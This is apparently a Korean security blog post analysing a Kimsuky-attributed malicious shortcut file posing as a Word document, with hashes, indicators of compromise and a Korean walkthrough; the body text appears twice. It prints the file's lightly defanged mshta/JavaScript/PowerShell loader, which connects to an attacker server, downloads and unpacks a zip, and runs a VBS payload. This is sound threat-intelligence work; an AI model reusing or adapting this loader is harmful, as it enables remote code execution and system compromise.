북한 김수키(Kimsuky)에서 만든 악성코드-20241003_20134.docx.lnk(2024.10.3)
Contents
오늘은 북한 김수키(Kimsuky)에서 만든 악성코드 인 20241003_20134.docx.lnk(2024.10.3) 에 대해 글을 적어 보겠습니다.
지난 시간에 적은 보조금신청건이나 암호화폐 거래소 업비트 사칭하고 거의 유사하게 작동이 됩니다.
mshta.exe 기능을 악용해서 해당 악성코드를 작동하면 파워셀을 이용을 하고도 있습니다.
먼저 해쉬값은 다음과 같습니다.
파일명:20241003_20134.docx.lnk
사이즈:2.37 KB
MD5:42f3e0840bde6eccd1e17b32b48d6096
SHA-1:c38a378d4d9af72957183cddebb2a659d024fd0c
SHA-256:aaecb10ca453bec3bb95bedac6d773a593ea984509845eb7b15d8894d4b385ad
이며 다음과 코드가 있습니다.
악성코드 내부
StringData
{
namestring: not present
relativepath: ..\..\..\..\Windows\System32\mshta(.)exe
workingdir: C:\Windows\System32
commandlinearguments: javascript:b="());$z=$r.ReadLine();$b=[Con"(+)"vert]
::FromB(a)se6";f="Stream";x="a=new Ac"+"tiveXObject('WScrip"(+)"t.Shell');a
.R"+"un(c,0(,)0);close();";a="Syste(m).IO."+f;t=" -Path $t -";n="New-O(b)jec
t System.";u="c:\\progra(m)data";c="power"+"shell -ep bypa"+"ss -c $r='206(.)
206(.)127(.)152';$p='9002';$r="+n+"IO.(")+f+"Reader(("+n+"N(e)t.Sockets.TcpCl
ient($r, $p)).Get"+f(+)b+"4String($z);$t='"+u+"\\t(.)zip';Set-Con(t)ent"+t+"V
$b -Encoding Byte;Expand-Archive"+(t)+"D "+u+";del $t(;)$v='"+u+"\\s.vbs';&$v
;sc "+u+"\\n1035 4";eval(x);
iconlocation: (.)docx
}
악성코드 설명
mshta.exe를 이용하여 자바스크립트 코드를 실행하는 방식을 취하고 있으며
1.mshta.exe 실행:
시스템 디렉터리에서 mshta.exe를 실행
2.자바스크립트 코드 분석:
코드의 시작 부분에서 b="());$z=$r.(R)eadLine();$b=[C(o)n"+"vert]::F(r)omBase6"가 보이며 해당 부분은 파워셸 명령을 실행하는 자바스크립트 코드로 문자열을 이어붙여 악성 스크립트를 은폐.
네트워크 통신**:
IP 주소 206(.)206(.)127(.)152와 포트 9002를 사용하여 원격 서버에 연결
공격자가 제어하는 C2(Command and Control) 서버
파일 다운로드 및 압축 해제:
스크립트는 원격 서버에서 데이터를 다운로드한 후 c:\\programdata\\t(.)zip 에 저장하려는 명령을 포함
이후 Expand-Archive 를 사용하여 압축 파일을 해제하고 압축 해제된 파일을 실행
압축 파일 해제 후 s.vbs라는 VBS 파일을 실행 추가적인 악성 스크립트나 페이로드가 실행
ActiveXObject 생성:
ActiveXObject('WScript.Shell')`을 사용하여 쉘을 실행하고 파워셸 명령어를 백그라운드에서 실행(a.Run(c,0,0))하려는 …
지난 시간에 적은 보조금신청건이나 암호화폐 거래소 업비트 사칭하고 거의 유사하게 작동이 됩니다.
mshta.exe 기능을 악용해서 해당 악성코드를 작동하면 파워셀을 이용을 하고도 있습니다.
먼저 해쉬값은 다음과 같습니다.
파일명:20241003_20134.docx.lnk
사이즈:2.37 KB
MD5:42f3e0840bde6eccd1e17b32b48d6096
SHA-1:c38a378d4d9af72957183cddebb2a659d024fd0c
SHA-256:aaecb10ca453bec3bb95bedac6d773a593ea984509845eb7b15d8894d4b385ad
이며 다음과 코드가 있습니다.
악성코드 내부
StringData
{
namestring: not present
relativepath: ..\..\..\..\Windows\System32\mshta(.)exe
workingdir: C:\Windows\System32
commandlinearguments: javascript:b="());$z=$r.ReadLine();$b=[Con"(+)"vert]
::FromB(a)se6";f="Stream";x="a=new Ac"+"tiveXObject('WScrip"(+)"t.Shell');a
.R"+"un(c,0(,)0);close();";a="Syste(m).IO."+f;t=" -Path $t -";n="New-O(b)jec
t System.";u="c:\\progra(m)data";c="power"+"shell -ep bypa"+"ss -c $r='206(.)
206(.)127(.)152';$p='9002';$r="+n+"IO.(")+f+"Reader(("+n+"N(e)t.Sockets.TcpCl
ient($r, $p)).Get"+f(+)b+"4String($z);$t='"+u+"\\t(.)zip';Set-Con(t)ent"+t+"V
$b -Encoding Byte;Expand-Archive"+(t)+"D "+u+";del $t(;)$v='"+u+"\\s.vbs';&$v
;sc "+u+"\\n1035 4";eval(x);
iconlocation: (.)docx
}
악성코드 설명
mshta.exe를 이용하여 자바스크립트 코드를 실행하는 방식을 취하고 있으며
1.mshta.exe 실행:
시스템 디렉터리에서 mshta.exe를 실행
2.자바스크립트 코드 분석:
코드의 시작 부분에서 b="());$z=$r.(R)eadLine();$b=[C(o)n"+"vert]::F(r)omBase6"가 보이며 해당 부분은 파워셸 명령을 실행하는 자바스크립트 코드로 문자열을 이어붙여 악성 스크립트를 은폐.
네트워크 통신**:
IP 주소 206(.)206(.)127(.)152와 포트 9002를 사용하여 원격 서버에 연결
공격자가 제어하는 C2(Command and Control) 서버
파일 다운로드 및 압축 해제:
스크립트는 원격 서버에서 데이터를 다운로드한 후 c:\\programdata\\t(.)zip 에 저장하려는 명령을 포함
이후 Expand-Archive 를 사용하여 압축 파일을 해제하고 압축 해제된 파일을 실행
압축 파일 해제 후 s.vbs라는 VBS 파일을 실행 추가적인 악성 스크립트나 페이로드가 실행
ActiveXObject 생성:
ActiveXObject('WScript.Shell')`을 사용하여 쉘을 실행하고 파워셸 명령어를 백그라운드에서 실행(a.Run(c,0,0))하려는 …
IoC
c38a378d4d9af72957183cddebb2a659d024fd0c
42f3e0840bde6eccd1e17b32b48d6096
aaecb10ca453bec3bb95bedac6d773a593ea984509845eb7b15d8894d4b385ad
http://206.206.127.152
42f3e0840bde6eccd1e17b32b48d6096
aaecb10ca453bec3bb95bedac6d773a593ea984509845eb7b15d8894d4b385ad
http://206.206.127.152